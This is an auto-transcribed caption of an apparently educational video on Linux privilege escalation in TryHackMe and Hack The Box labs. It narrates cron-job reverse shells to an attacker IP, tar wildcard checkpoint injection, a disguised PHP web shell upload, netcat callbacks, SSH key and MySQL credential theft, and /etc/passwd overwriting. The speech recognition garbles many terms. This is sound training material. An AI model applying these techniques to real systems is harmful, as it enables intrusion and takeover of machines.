Linux Privilege Escalation Crash Course

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hey thanks for stopping by my channel so in this video we're going to be covering some very basic Linux privilege escalation and enumeration this is actually from my complete ethical hacking course this is just kind of an introductory I was thinking about expanding the Linux privilege escalation and enumeration portion as well as the windows enumeration file transfer and privilege escalation but before I went ahead and put in all that time and effort I decided to release some small portions from that complete ethical hacking course to see if this is something that you guys are actually interested in and add some more intermediate level enumeration and escalation on both Linux and windows so if this is something that you would be interested in seeing more of please let me know down in the comments and I will get to working on those now let's jump into it alright we are here at try hack me I've decided to come here for the Linux privilege escalation because we can pretty much do everything in one place and we can look at some of these scans and we can see just exactly how this is going to work so we're going to walk through quite a few of these but we'll go ahead and we're going to look at a couple of different tools so the first one I want to show you is going to be Lin piece so this is a brother to or sister however you want to look at it to win peas so we'll just Google Lin peas and it'll bring you to this page it'll be the first one so Len peas right here on GitHub it's the same as before what you do is you're going to scroll down and you're going to go to the release page you'll click on this I just grab the first one so just click on this you can click download and it will save to your downloads and then what you'll do is you can just move it from your downloads by typing in copy and then the location which is going to be your home so it'd look like this if I wanted to copy it to my desktop I would go copy home the machine the downloads and then the file which is lint piece and then I just put period to copy it to my current directory or if I wanted to copy it to a different location I would put the full path in there as well and so you'll go ahead and copy that to your tools folder which I have already gone ahead and done it is right here and so you'll want that there and then the other one we want is Lynn enum and we're going to look at Lin and NuMe I don't use this really that often but I I like to have it and it's one I want to show because it's not going to highlight things for us and it'll be easier for us to walk through uh what we're looking at without Lin P's just giving us all of the answers so we're going to go ahead and grab Lin and NuMe as well you'll go ahead and you'll just type in I typed straight into the URL but this is the URL where you're going to go you'll just go ahead and type in Lin and NuMe and then you can type in this right here and it'll pull you up this get paid this GitHub page clicklinum.sh you can right click it or and go copy link location or you can come in here and save things the way I do I go into raw I highlight it all with command a I copy with command C and then I G edit a page over here and then I paste it in and so that's how you're going to get those and then we're going to go back over to try hack me and we're going to SSH into this box I'll have already done that and we will begin looking at some of the privilege escalation ways in Linux so we are going to be talking about cron jobs these are files that get executed every one minute every five minutes every day or week I already went ahead and ran Lin enum and Lynn peas and so here's the output for Lenny NuMe and we actually come up here it actually starts up here so it'll tell us what files are getting run daily and which ones are hourly and monthly and then down here it actually tells us like we have the ability to run this uh a shell bin bash well this isn't bash this is bin sh um here through the home user path and so this is in our path we have the ability to write to it and it'll tell us down here what each one of these stars mean so you have a minute hour day month or day of week so we have this right here these all stars means that it runs every minute every hour and and so on and so forth so both of these files here so this one is going to be in a path and this one is just a file so we should be able to find the location of this file and then just overwrite it and be able to get a reverse Shell through this because it's being run as root and so when root runs a file and we put in a reverse shell when root runs the file we'll be able to set up a listener and root will reach out and we'll be able to get a reverse shell on another tab so that is LIN enume we can come down to Lynn peas right here and we can actually see it lights it up for us it says this path right here is vulnerable these are being run as root and it's happening all all the time every minute we have the opportunity to overwrite this file so what we'll do is we'll see if we can find this file location so we'll go locate and it will paste and we'll type enter and it tells us that the file is right here so we should be able to just go to Nano and then paste this in and this is what is being run right here so it says bin bash and then it's just echoing the date and then it's going into nowhere so we can actually just come in here and we could leave that actually doesn't say we could delete it or we could leave it and what we want to do is put a reverse shell in here so I shared this with you earlier this is a place to go pin test monkey and you can get reverse shells we can just come in here because this is running a bash script or a bin sh script it's a bash bin bash you can come in here and you can paste in this bash script and we'll go ahead and use the famous Port 4444 got one too many there and then we just put in our IP address and I think mine is 10 2 42 .96 and so that looks okay come over here we will set up a netcat listener on Port four four four four and we will go ahead and save this out and when it is executed we will get a reverse shell over here so we'll go ahead and wait for this to reach back to us and I will restart the video it shouldn't be more than a minute okay and it has reach back out and we have our root shell so what happens essentially one more time is the server is going through and it is running these jobs every week every month Ever every hour and these ones every minute and so because this is being run every minute or every five minutes if you ever are doing a capture the flag or a certification or really any box and you see every minute or five minutes you can be thinking this is probably going to be your way in especially if Lynn piece lights it up for you so what happens is this is being run as root and when root runs this file and it runs our reverse shell right here we'll go ahead and open this back up when it runs this essentially what it's saying is root wants to reach out to this IP address on this port and offer up a shell A bash shell and so when this happens we come over here and we have this shell come through and it comes through as root because root executed our file and with that we'll see you in the next con job video all right the next video is going to be covering the Cron job wild cards and these are ones that I see a whole lot less but it is one that you should be aware of nonetheless and one helpful tool that I forgot to mention to you guys it'll be linked over in the course resources of this video is right here GTFO bins so you can just delete this and save GTFO bins it is a really helpful place to go especially when you're trying to do privilege escalation and in this specific one it actually tells us that we can break out of a restricted environment by spawning an interactive shell and so we saw from our Lin peas and or Linda NuMe that we have this file running right here and so what we can do is actually come in here we can copy this I'd have a space there at the end we can copy this and we can cut this out so we can see what's going on and this is where I come up with the tar so that we can go and check this out on GTFO bins and it will actually tell us what we need to run in order to get this to work so what we're going to do is we are going to come back here and we're going to need a reverse shell payload so one of the things that I have shown you showed you earlier is when we make these we make them right here with msf Venom and so we can go ahead and I'll go ahead and run that so the way we have it but what you need to know when you are making one of these and where I got this is right here we go into our Linux and because this is a Linux box and we're making it a payload with msf Venom we need to just copy this and then you change your Port you change your IP address and then you set up the shell you want but what's different here versus the web payloads is we actually need to have the right architecture and if you saw we we're running an x64 if you try and run this as an x68 it is not going to work and the way you find that is by typing in a youname dash m so you type in youname dash M and it'll tell us this X 8664 and if you didn't know what this was you could just copy this paste it into Google and it will tell you but for our sake we're going to be needing to run x 64 not x86 so that's how we come up with the type of payload that we're going to be generating and I went ahead and already pre-filled out everything so that we would have it and now what we'll do is we need to transfer this over to our vulnerable server so we'll come over here we are in the home directory and we're going to run aw get and we're going to run it on my IP address http 10 to 42 and 96 and then we're going to slash and we're going to call this shell dot elf and we will need to start up a server so that we can transfer this file and we're going to do that with sudo python 2 Dash and dash M simple HTTP server and we're going to put that on Port 80 and we're going to type in the password and now we have this up and running we're going to go ahead and get this and it has grabbed it and so what we'll need to do now is make this executable and we need to do that with a CH mod and then we can go plus X and then we can just type in the payload right there and now what we also are going to have to do is we're going to have to make a checkpoint for the server to know where to look in the path for this file so we'll go touch and we're going to slash home user and then we'll go dash dash checkpoint equals one make sure that looks right it does then we'll go touch slash home slash user slash check checkpoint I spelled that wrong check point slash action equals and this is to execute our file and that looks okay so now what we're going to do is we're going to have to come back over here we'll close out of that we can set up the netcat listener that we had running earlier on Port 444 because that's one the port we set it up on and now this should execute and I'll bring you back whenever it has oh it already has come back and there is our shells that is the con job wild card it's a little confusing um but just watch this a few times and then maybe um we'll practice it later on in this course and it won't be so confusing and with that I'll see you in the next lecture all right there is one way of privilege escalation that I want to show you guys that you will see in the future one that you'll need to know and that is through MySQL so we actually have MySQL here one thing to always check is your history so when you come onto a box you can type in history and we actually see we have MySQL some localhost user password123 so what you can do is type it in this way so we just use MySQL Dash root and we are here in the mySQL database and so what we'll do is go show databases and you can save these in your nodes just pretty much just like this and then we'll use MySQL or we'll use whatever database seems interesting and then we can show tables forgot my semicolon there so if you hit this Arrow it's because uh you need a semicolon to close off your SQL query and then you can look through here and you can go through all these files and see what looks interesting to you uh this looks interesting the database is but we're going to go into the users probably 90 of the time or more you're going to want to go into the users and so you can actually come in here and we'll just select all and some of this should look familiar from the SQL injection so select all from user and this actually gives us a very non-pretty version of the user and the password there's another way to do to do this we can go select and then we'll go user because remember our we're looking for the user inside the table which we actually have MySQL here so we're going to be inside this user we're going to go select user and then inside the user I'll show you actually it looks like this describe the user so inside the user column we want to find the user and the password so what we're going to end up typing in is select the user and the password and it's going to be from the table user and then when we close that off and we hit enter it makes it look a whole lot prettier so sometimes you'll come in here and you'll have users and there'll be plain text passwords but most of the time you're going to have something like this and you're going to have to try and crack this password but this is helpful you're going to need to know it you're going to come across it in the future so remember that you can just type it in this way and you can have the very non-pretty version or you can go about it and grab the passwords this way I'd go ahead and save those SQL commands because you're going to need them in the future unless you know SQL really well or you are up for the challenge of Googling in the future or I guess you don't have to save them and you can just refer to this video either way you're going to need to know that MySQL is something you need to look through in the future and it's something you should always be ready to check and I'll see you in the next video all right in this video we're going to be going over some password hunting within Linux this is something that some of the tools will cover for us but it's always best to try and do it manually especially if you get stuck at a dead end and what we are going to do here is where it payloads all the things what you'll do is you'll just come over here and you can copy these and you can just paste them straight into the box that you have a shell on and you'll go ahead paste it and hit enter and see if any Files come back that look interesting and we can go ahead like some of these I'm pretty sure are actually available on this specific box so what you'll do is you'll come over here you just hit enter and they there they are and you can actually since these are just files you can copy these and you can look and see what's inside of them we are going to continue with this these passwords password hunting isn't the only thing you want to hunt for this right here these SSH Keys is definitely something that you need to be aware of you will come across these in the future but sometimes you're going to go like that you'll paste it in and nothing's going to come back and it's because the key is not actually named ID RSA most often that's what it's going to be called but in this specific case it is actually called root underscore key yep and there it is and so we can actually go into where this file is and we can CD slash dot SSH and then the file should be right here and what we'll do is we'll go CH mod and then we type in dash or sorry root key and boy I'm really struggling teach mod and then we need 600 so that we can use this key and it says changing permissions of the key is not permitted and we can go ahead and see if this will actually work anyway we can go SSH Dash I root key and then we'll go root at and then we put in whatever IP address we're trying to SSH to and in this case it's 182.85 and we can go ahead and hit enter and it says do you want to fingerprint the Box we say yes and we are root most of the time you are going to have to chmod 600 this I'm not sure why that didn't work in this case but that is how you would go about finding an ID RSA key and sshing into the box and you'll also want to remember and put in your notes or in your workflow password hunting so with that I will see you in the next video okay we are going to be talking about Su IDs or the set uid these are going to be something you're going to see but they're not as straightforward as you might hope every single suid I have ever come across has taken me more time than I think it should because when you think about it and you go to GTFO bins they look really easy but every single time every payload I've ever had to deal with has required some kind of modification or wasn't as straightforward as I had hoped so these are something you're going to see in the future so if you come over to payloads all the things the suid is right here and it tells us it set stands for set user ID so the way we find these Lin peas and Lynn enum both will find these but you can also just come in here and you can copy you can paste and you just press enter and it will pull them down for us so when you do this it's going to look like this is what we're looking for this s right here we're looking for the sticky bit and the sticky bit will be right here and this is for the root user so the root user has read write access and then the S is enabled so when we see something like a CH mod 777 and then file here what's happening is they're changing this to read write execute all the way across for the root user the group users and the local user so it would be a seven here this would be four bits so if you saw something like this four seven seven it would be or a 444 what you'd be enabling is the read access and then this would be the two bits which is the right access and you would see something like A6 so like when we see the CH mod 600 and then when you see all sevens it would be read write execute all the way across and so this is what we're looking for right here this s and then if it was a g uid this would be a g and this would be a t but really what we're looking for right now is just the s-u-i-d so we're looking for this one right here for this sticky bit and what we'll do when you come across these way you enumerate these Lin peas is the best because it's going to just highlight it it'll just highlight if one is vulnerable but you might have to come across um manual enumeration at some point and Lin piece isn't going to find it so what you do when you enumerate these is eventually you'll get used to just seeing them and you'll know what's there but you come over to GTFO bins you'll go to suid you will click on this and then what you do is you just look for you can go straight down and you can go chsh and you can come down here and you can just look for c h s h and then you can go okay that's not in here we can look for sudo I know sudo plain pseudo's not in here I think sudo might be in here with an extension nope see so I still have to come here and look through these and you will probably too so we can go through and you can look for these and then when you find one and you click on it it will tell you how to carry out the execution for getting the file you need or to get root access that is the suid we're going to go ahead and jump into a box that has an Su ID in it and you can go ahead and try and do the foothold on your own and we can work on the privilege escalation together or you can just follow along through the whole thing I will see you in the next video okay we are back and we're going to be doing a box from hack the box it is called bank and so you can go ahead and connect to hack the box and launch the box and so you can connect and you can begin with your nmap scan but before we do I want to challenge you guys to go ahead and try this box on your own we've covered everything necessary to gain a foothold and I just want to give you a tip it's going to be a little more enumeration than what you might think when you first try to do your enumeration on this web server here but before you go ahead and begin this box there's one thing that I want to cover sometimes when you're doing hack the Box machines because we're working in a virtual environment they label their web servers not always but sometimes with a htb normally if you're out in the real world you're going to come across.com.net.org.gov things like that but because they have linked their web server to htb we're going to have to add that to our Etsy host file and just a heads up sometimes when you come out and you do boxes on your own and you're trying to work through hack the Box on your own when you come to a web page and you type in the IP address normally when you need to add it to your Etsy host file is when it doesn't render so usually it won't render anything in this case it's a little more tricky because the page actually does render but what we'll have to do to go through and do this we'll type in sudo G edit Etsy host and you'll hit enter right here and so enter this and we can type in our password okay and here we are and what you'll do is you'll type in 10 10 10 29 bank.htb and you will save this one thing to remember is when we have Port 53 open is to go ahead and enumerate it we actually did not cover the way to enumerate it that works on this box because we used I believe NS lookup and DNS Recon but what actually works on this box is a dig a xrf and then bank.htb and then we enter at 10 10 10 29 and so when you run this um I'll actually go ahead and run it to remember to add this into your notes uh it's another way to enumerate Port 53 and look for additional Pages for us to add to our Etsy host file in this case or to go out and look at so if you wanted to be really thorough in your editing your Etsy hosts you would go in and you would add bank.htb Chris Dot bank.htb and you would even add this NS dot Bank Dot hdb and you just you just go through and add all of these in this case uh bank.htb will get us everything we need but I thought I'd go ahead and show this to you so that you would be ready in the future and you wouldn't be caught off guard when you see it so I'm going to go ahead and give you the challenge to try and solve this box on your own we've covered the privilege escalation we've covered the foothold already in this course so I'll go ahead and if you want you can pause the video now and give this a try or you can continue along the video and do follow along so we'll go ahead and we'll go bank.htb and this brings us to a web page and what you can do here is you can go ahead and try SQL injection you can launch SQL map which is something you can't use really you're not you shouldn't use it in a real world pin test you definitely cannot use it on a bug Bounty and you're not allowed to use it in a lot of certifications so we're not going to mess with it at this point but what we're going to do is we're going to go ahead and start our go Buster and because we see this dot PHP what we're going to do is we're going to go with our Go Buster and so we'll come over here we'll just open up a new tab we'll type uh go Buster Dash der Dash uh we don't do a Dasher we go dur Dash u e slash slash and we're gonna type in Bank dot hdb um rather than the IP address we're going to go with our word list and this is where I think it gets a little tricky because you will have to use a different word list than what we've been using you can go out and grab seckless uh word list that's the one I usually use when I'm trying to find directories but in this case I have one that I've actually modified so we'll go ahead and go I think it's gonna be home and then Cali desktop it's in tools and I called it just wordlist.txt so go ahead and run that and it's going to start pulling down directories for us in Pages for us to go ahead and look at right away we can go try and see what these render go ahead and see where this takes us and we get this login page which doesn't really look like it's going to do us any good this is also at the bank login let's go ahead and delete this and see if we get anything different and we hit this forbidden page one thing I have not tried but I am curious now that we see this forbidden page is to run this and to intercept this forward let's put in a 200 okay and see what happens okay still tells us the same thing so we'll come in here we'll come back and this right here looks interesting so we'll go ahead and check this out bank transfer that sounds like something you don't want someone to be able to see that does not work so what we'll do is maybe we do need to go over here and edit our Etsy host file I thought we could get away without adding these in so we'll go ahead and add this paste and we can add this paste and we'll go ahead and add this one and we'll paste and we'll save that and we will try and come back here to this and we will type in slash slash balance transfer okay so we do need those in there now it brings us to this page with all of these files and so what we can do is I have come to Pages before similar to this um not not quite this extensive but pretty extensive and I went through and looked at every single one of these before I was able to find the vulnerability but in our case when we look at this we can just see these are all pretty similar in size and so they're going to be what I would do is I would just look at one that's got a 583 a 584 and a 585 because it's probably going to be pretty much all the exact same files and if you do look at one of those it just turns out to be something that's encrypted and here's one that is different and so what we'll do is we'll go ahead and click on this we will click save file and it will save to our downloads so what we can do is CD over to our downloads and then we can we'll cap this file out and see what is inside of it and what we end up with is an email and a password so remember that login page that we started at we can try that SSH is also open and whenever I find credentials that's probably where I'm going to go first is I'm going to try an SSH into the box and that is not going to work so then we'll go back to our login page and what we will do is just copy this paste it in we will copy this and we will paste it in we will submit we will not save so when we come to a web page the first thing we automatically do is we start clicking around that doesn't do us any good and you click to see if you can do anything this would be terrible if you found this in real life for whoever you're testing and then we come over to support and then we're brought to this page and it has a file upload and whenever you see file upload you can automatically just start trying to upload different files you can try documents you can try pngs for us we would want to try a PHP especially since it's running PHP to see if we can get a reverse shell so what we'll do is we can come in here we can upload a file so we can go ahead and try this and we will want to turn on our Interceptor and we will type in test type in test we'll choose the file we'll go ahead and submit we go forward forward oh I just forwarded past it okay says it was a success that's a good thing we can come in here and we'll just type in file this time and we'll go file we'll choose our file pick our GIF we will turn intercept back on and hit submit and we are brought to this page we're going to send it to repeater and we'll go ahead and send that on its way and since we already know this works we can send this and see the response we can render the response you can look over here and it says it was a success so we can come back over here and if you look through here we will see what it tells us we have this comment here that actually tells us what we need to do next so this is something you're probably not going to see in in real life but it's something that they've gone ahead and done on a hack the box is it says I added the file extension HTTP htb to execute as PHP so what happens is if we change to this what we'd want to do if we're trying to upload a reverse shells we would change this to PHP but in this case it says PHP is blocked but we can use Dot htb and so the next thing we need to do is if you just try to upload a PHP shell and I'm telling you this just to save time it's not going to work but we need to trick the server into thinking that we are uploading a PHP show and I have a gigantic GIF here that is going to take a second for me to highlight highlight and then delete so I'll just bring you back once this is deleted okay now that we have that all deleted the reason we kept this right here is because it'll tell the server that we're uploading an image and that's what we need to do in order to bypass the filter and so you can actually just go out to Google and just type in pretty much anything dot GIF and then go to image and just download a gif so that you can do this or you can make a file and you can just make this the beginning of the file and save it and then upload that instead of doing what I just did and deleting all of that mumbo jumbo but we'll go ahead since we've already deleted it and this file is already here so we'll call this htb dot http so that way it will execute as PHP and we have seen this before we'll come up here and we're gonna go sell that okay and we're gonna go web shells we're gonna grab this web shell that we have used in the past that is not what I needed I need this I need this and we're going to come over here and we are literally just going to paste that in and then I'm going to change the name to file one so that way we have it and we'll send it it tells us that went through so now what we need to do let's we'll actually just refresh this page and we'll resend it okay we have file one this is the one we used we'll click on it it takes us to the page and if you remember how web shells work we just type in question mark CMD for the command which was the variable we decided to use and then a command who am I and this should execute we are www data since we have command execution on this box we can go ahead and delete that we will grab a reverse shell from a reverse shell cheat sheet I actually tried to run a python so a python shell so I typed in which python sent it it says we have python I still could not get the python shell to run I also tried bash and I couldn't get that to work so I what I did is I went um and I tried Python and I tried bash I skipped PHP and I decided to go straight for netcat so this was actually the third one that I tried and we'll go back over here just type this in and what I am going to do is I'm just going to leave this as one two three four because I don't really want to have to delete it 10 point 14.15 if you remember how this works we will need a netcat listener so we'll just go netcat lvnp1234 or whatever Port you decided to roll with we will send that and it did not hang so something didn't work okay I wasn't listening we'll send it again and let's check our shell it says it connected so if we go ID or who am I it says we are connected to this box so now what I like to do is I like to have a full interactive shell so you can go ahead and type in Python because we already checked which python Dash C and I don't know if we've seen this before but it just gets us this little prompt right here so we can go M4 Dash p don't need a dash PTY PTY dot spawn and then we come here slash bin slash Bash and then close this off and we now have this right here but for editing purposes later on in the video because we're going to have to edit some files if you just try to edit a file exactly how this is it doesn't work you have a mess and it is really quite difficult you can get around it by importing files and I can show you guys how to do that later but I'm going to go ahead and if you hit command Z actually I'll just show you so we LS if I try to type in GIF and I hit tab nothing works and it makes it really difficult to edit files inside some boxes so we're going to go ahead and hit command Z we're going to type in s t t y raw Dash Echo and then we'll have this little colon here and then the FG just brings us back into the box so you can hit enter and then you have to hit enter again and now if we type in GIF and we hit tab it works and it also makes it so we can edit files so I want you to go ahead and see if you can figure out the privilege escalation on this video on your own so go ahead and see if you can pull over Lin peas and run it and find the vulnerability okay how did that go I'm gonna go ahead and cancel this we're gonna we're gonna go ahead and CD over to desktop tools we're going to need a simple server and now we have this launched we can grab Lin peas onto our box so we can go ahead and go um wget and then we can type in our IP address and then we're going to type in Lin peas dot sh and that should grab we can bash Lin peas and we'll run that all right instead of reading through this Lin peas file here you're going to see that this box is actually vulnerable to several different vulnerabilities that we have in fact covered so you can go ahead and do those on your own but we are just coming out of the suid privilege escalation and I want to cover that so this doesn't actually pick up on the suid vulnerability and so what we're going to have to do is we're going to come all the way down here to our Command Prompt we're going to go to our payloads all the things we're going to copy this and paste this in the reason I want to cover this is because I told you that these are not always that obvious so limp piece doesn't even pick it up because it doesn't recognize this and also we are going to see one that isn't how you would cover it here in the GTFO bins so this one is a little bit different than what we have seen already and honestly every suid I have come across is not common like they're all different and they all require some Googling and so when I originally did this with the suid is I copied this and I typed in cat and then I pasted it in and we can go ahead and do that it just gives us back a bunch of unledgeable stuff and so I didn't know exactly what this was doing so I ended up coming in here and I just tried to execute this file and if you look and we go where am I we are now root and so suids are a bit tricky they're not always straightforward and this one is no exception it is not how you would expect it to be and so that is the suid vulnerability in this box you can change the password to the Etsy pass WD file and I would challenge you to go ahead and do that it is a little tricky on this box so it may take a few tries and with that I will see you in the next video all right we are going to go ahead and shoot the Etsy pass WD video I decided to go ahead and make this video because I was kind of having a little bit of trouble with it myself getting it to actually load so I want to walk you through exactly how to go ahead and get that done and also while we're here if you remember the way we uploaded this file was we went ahead and put something in here put something in here we chose a file and then we did a gif and then we just saved those first few characters and then put in our web shell right here so I actually decided to go ahead and show you another way to do this you can actually is a way faster too you can make your own file just like this we'll go ahead and we'll cut this out we just need the GIF 87a and then the web shell and we just saved it as htb so that way it would execute the PHP code if you remember the note we found inside the Box a little clue and now we don't have to mess with repeater we don't have to put this inside burp we don't have to delete those characters we can just upload this straight away so we can just choose this file and upload it and submit and it goes right through and we can come over here and we can type in CMD who am I and we get ww data so we can go ahead and delete this and upload our netcat shell for this and I guess we'll just delete all that go 10 14 15 or we'll just make it one two three and then we need to set up our netcat listener so that we can get a uh call back on our box here we'll go ahead and hit enter not sure what went wrong just try it again and 10. 14. 15. let's go ahead and send that that time it looks like it's hanging if you remember we need to type in Python Dash C import BTY PTY dot spawn and whoops we'll need Ben bash and then close all this out looks good and now if you remember we need to come over here and we hit command Z to put that in the background and then we type in stty raw minus Echo and then the FG and then we'll hit enter and then we'll hit enter again and that's very important to getting this to work because without that I really was struggling to edit the Etsy pass WD file so what we'll do is we'll go ahead and we'll cat the Etsy pass WD we are going to copy all of this so that way we have it just so that way we are used to having this in best practice just in case we screw it up we have it here and we can save it right here we'll go g edit and we can type in um we'll just type save it as pass WD paste that in there and we're going to go ahead and copy this root and we're going to make a new one hit enter and if you remember we need something to go right there our new password so we'll come back over here we type in open SSL pass WD password is pass hit enter it gives us a new password we copy it we replace it with this X we're going to copy this copy okay now here comes the tricky part we're going to go ahead and do Vim and we're going to go Etsy pass WD hit enter and we're going to go ahead and because I don't really care to mess this up too much because it's just a regular practice box we can come up here we can hit enter we're going to paste in our new box our new user and you can see nothing showed up here except for this T so what actually ends up happening is we need to hit Escape in order to close out and then we put our colon in and then we go W exclamation point to overwrite it and now it's overwritten but the problem is I'm not able to get out of here so we have to just go ahead and close that and we have to make a new tab we have to set up a new netcat listener and reconnect and actually I think this is over here I'm just going to copy this so I don't have to retype it in paste enter and now we should be able to cat the Etsy pass WD here's our new user it just saved as T because root didn't get all the way in there so we can just switch users to T and then we'll type in the password that we made and we are now root so that is a kind of difficult way to get the Etsy pass WD file overwritten for some reason I no matter what I did I was unable to write that the correct way into the past WD file and I had to come over and make my own copy it paste it in and it always deleted the first few characters of root and this time we luckily had just the tea left over but that is one way to go ahead and overwrite the Etsy pass WD file so I hope you were able to get this on your own if not you can go ahead and try it again because you're surely going to see this again in the future

Info

Channel: Ryan John

Views: 16,389

Rating: undefined out of 5

Keywords:

Id: t_1v5G_uKqw

Channel Id: undefined

Length: 50min 10sec (3010 seconds)

Published: Tue Nov 22 2022